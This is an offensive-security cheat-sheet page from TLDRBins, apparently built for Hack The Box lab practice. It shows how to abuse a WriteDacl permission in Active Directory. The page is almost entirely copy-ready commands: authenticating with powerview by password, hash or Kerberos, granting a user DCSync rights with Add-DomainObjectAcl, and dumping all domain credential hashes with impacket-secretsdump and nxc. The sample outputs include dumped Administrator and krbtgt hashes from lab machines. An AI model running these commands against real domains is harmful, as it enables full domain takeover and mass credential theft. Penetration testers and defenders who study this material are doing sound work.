TLDRBins TLDRBins / WriteDacl


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Authentication Method

Add DCsync Right to User

1. Connect

# Password powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output: $ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# NTLM powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>'
Sample Output: $ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# Password-based Kerberos powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output: $ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' -k ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# NTLM-based Kerberos powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>' -k
Sample Output: $ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' -k ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# Ticket-based Kerberos powerview '<DOMAIN>/<USER>@<TARGET>' -k
Sample Output: $ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -k --no-pass ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯

2. Add DCsync Right

Add-DomainObjectAcl -PrincipalIdentity '<USER>' -TargetIdentity '<TARGET_IDENTITY>' -Rights DCSync
Sample Output: (LDAP)-[DC01.corp.local]-[CORP\WEB01$] PV > Add-DomainObjectAcl -PrincipalIdentity 'WEB01$' -TargetIdentity 'DC=corp,DC=local' -Rights DCSync [2024-10-01 12:51:36] [Add-DomainObjectACL] Found target identity: DC=corp,DC=local [2024-10-01 12:51:36] [Add-DomainObjectACL] Found principal identity: CN=WEB01,OU=Web Servers,OU=Servers,OU=Corp,DC=corp,DC=local [2024-10-01 12:51:36] DACL modified successfully!

1. Import PowerView

. .\PowerView.ps1
Sample Output: *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . .\PowerView.ps1

2. Add DCsync Right

Add-DomainObjectAcl -PrincipalIdentity '<USER>' -TargetIdentity '<TARGET_IDENTITY>' -Rights DCSync
Sample Output: *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

Secrets Dump

# Password impacket-secretsdump '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output: $ impacket-secretsdump 'sequel.htb/ryan.cooper:NuclearMosquito3@dc.sequel.htb' Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40::: ---[SNIP]---
# NTLM impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH>
Sample Output: $ impacket-secretsdump 'sequel.htb/ryan.cooper@dc.sequel.htb' -hashes :98981eed8e9ce0763bb3c5b3c7ed5945 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40::: ---[SNIP]---
# Password-based Kerberos impacket-secretsdump '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output: $ impacket-secretsdump 'sequel.htb/ryan.cooper:NuclearMosquito3@dc.sequel.htb' -k Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [-] CCache file is not found. Skipping... Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40::: ---[SNIP]---
# NTLM-based Kerberos impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -k
Sample Output: $ impacket-secretsdump 'sequel.htb/ryan.cooper@dc.sequel.htb' -hashes :98981eed8e9ce0763bb3c5b3c7ed5945 -k Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [-] CCache file is not found. Skipping... Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40::: ---[SNIP]---
# Ticket-based Kerberos impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -k -no-pass
Sample Output: $ impacket-secretsdump 'sequel.htb/ryan.cooper@dc.sequel.htb' -k -no-pass Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40::: ---[SNIP]---
# Password nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --ntds
Sample Output: TO-DO
# NTLM nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' --ntds
Sample Output: TO-DO
# Password-based Kerberos nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --kdcHost <DC> --ntds
Sample Output: TO-DO
# NTLM-based Kerberos nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' -k --kdcHost <DC> --ntds
Sample Output: TO-DO
# Ticket-based Kerberos nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -k --kdcHost <DC> --use-kcache --ntds
Sample Output: TO-DO